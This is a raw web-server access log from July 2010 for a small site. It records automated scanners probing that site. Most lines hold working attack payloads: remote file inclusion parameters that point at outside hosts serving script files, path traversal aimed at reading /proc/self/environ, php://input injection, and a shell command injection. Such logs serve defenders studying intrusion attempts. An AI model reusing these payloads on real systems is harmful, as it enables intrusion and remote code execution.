83.93.131.189 - - [24/Jul/2010:07:20:09 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:07:24:47 -0700] "GET /logs/access_100605.log/index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:07:24:49 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:07:24:51 -0700] "GET /logs/index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
92.43.20.37 - - [24/Jul/2010:07:25:04 -0700] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.jobget.net/templates/system/css/mysystem/casper//Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.getyourselfahorse.com"
92.43.20.37 - - [24/Jul/2010:07:25:04 -0700] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.getyourselfahorse.com"
92.43.20.37 - - [24/Jul/2010:07:25:33 -0700] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.jobget.net/templates/system/css/mysystem/casper/Ckrid1.txt? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.getyourselfahorse.com"
92.43.20.37 - - [24/Jul/2010:07:25:33 -0700] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:36 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:36 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:36 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:36 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:37 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:37 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:38 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:07:25:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:07:26:26 -0700] "GET /logs/access_100605.log/index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:07:26:28 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:07:26:31 -0700] "GET /logs/index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:07:27:15 -0700] "GET /logs/access_100605.log/index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:07:27:18 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:07:27:18 -0700] "GET /logs/index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:07:34:45 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:07:34:45 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:07:34:45 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:07:40:08 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:42:05 -0700] "GET /logs/access_100417.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://corailbleu-voyages.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:42:06 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://corailbleu-voyages.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:42:07 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://corailbleu-voyages.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:07:42:24 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:42 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:43 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:43 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:07:42:43 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:07:43:32 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:07:44:37 -0700] "GET /tools/send_reminders.php?includedir=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
188.127.248.175 - - [24/Jul/2010:07:44:53 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
188.127.248.175 - - [24/Jul/2010:07:44:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:07:46:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:07:50:52 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:07:50:52 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:07:52:44 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:53:39 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://corailbleu-voyages.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:07:53:54 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:07:53:54 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:07:53:54 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:54:13 -0700] "GET /e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:54:13 -0700] "GET /logs/access_100410.log%20%20//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:54:13 -0700] "GET /logs//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:07:54:14 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:54:49 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://corailbleu-voyages.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:54:49 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://corailbleu-voyages.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:07:56:24 -0700] "GET /logs/access_100515.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
119.192.156.86 - - [24/Jul/2010:07:58:02 -0700] "GET /logs/access_100410.log%20%20//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
119.192.156.86 - - [24/Jul/2010:07:58:02 -0700] "GET /logs//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
119.192.156.86 - - [24/Jul/2010:07:58:02 -0700] "GET /e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
119.192.156.86 - - [24/Jul/2010:07:58:03 -0700] "GET /logs/access_100410.log%20%20//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
119.192.156.86 - - [24/Jul/2010:07:58:03 -0700] "GET /logs//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
119.192.156.86 - - [24/Jul/2010:07:58:04 -0700] "GET /e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:59:08 -0700] "GET /e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:59:08 -0700] "GET /logs//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:07:59:08 -0700] "GET /logs/access_100410.log%20%20//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:07:59:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:07:59:39 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
119.192.156.86 - - [24/Jul/2010:08:00:30 -0700] "GET /logs//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
119.192.156.86 - - [24/Jul/2010:08:00:30 -0700] "GET /e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
119.192.156.86 - - [24/Jul/2010:08:00:31 -0700] "GET /logs/access_100410.log%20%20//e404.php?INCLUDE_FOLDER=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:01:54 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:01:54 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:01:54 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:08:03:39 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:08:03:39 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:08:03:39 -0700] "GET /logs/access_100508.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:08:03:39 -0700] "GET /logs/access_100508.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:08:03:39 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:08:03:39 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
217.113.61.155 - - [24/Jul/2010:08:07:56 -0700] "GET /logs/access.log/index.php?option=com_hsconfig&controller=http://crespon01.fileave.com/crespon/Ckrid1.txt.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
217.113.61.155 - - [24/Jul/2010:08:07:56 -0700] "GET /index.php?option=com_hsconfig&controller=http://crespon01.fileave.com/crespon/Ckrid1.txt.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
217.113.61.155 - - [24/Jul/2010:08:07:56 -0700] "GET /logs/index.php?option=com_hsconfig&controller=http://crespon01.fileave.com/crespon/Ckrid1.txt.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:08:08:07 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:08:08:11 -0700] "GET /logs/access_100529.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:08:08:12 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:08:08:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
207.46.195.235 - - [24/Jul/2010:08:10:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:08:10:28 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:08:10:29 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:10:49 -0700] "GET /logs/access_100417.log/tools/send_reminders.php?includedir=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:10:49 -0700] "GET /tools/send_reminders.php?includedir=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:10:50 -0700] "GET /logs/tools/send_reminders.php?includedir=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:11:03 -0700] "GET /logs/access_100612.log/tools/send_reminders.php?includedir=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:13:35 -0700] "POST /logs/access_100417.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:13:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:13:35 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:13:48 -0700] "POST /logs/access_100612.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:21:13 -0700] "POST /index.php?option=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:21:20 -0700] "GET /index.php?option=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:21:27 -0700] "GET /index.php?option=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
212.158.160.121 - - [24/Jul/2010:08:21:49 -0700] "POST /logs/index.php?option=com_weberpcustomer&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "getyourselfahorse.com"
212.158.160.121 - - [24/Jul/2010:08:21:50 -0700] "POST /index.php?option=com_weberpcustomer&controller=php://input HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "getyourselfahorse.com"
212.158.160.121 - - [24/Jul/2010:08:21:52 -0700] "GET /logs/index.php?option=com_weberpcustomer&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "getyourselfahorse.com"
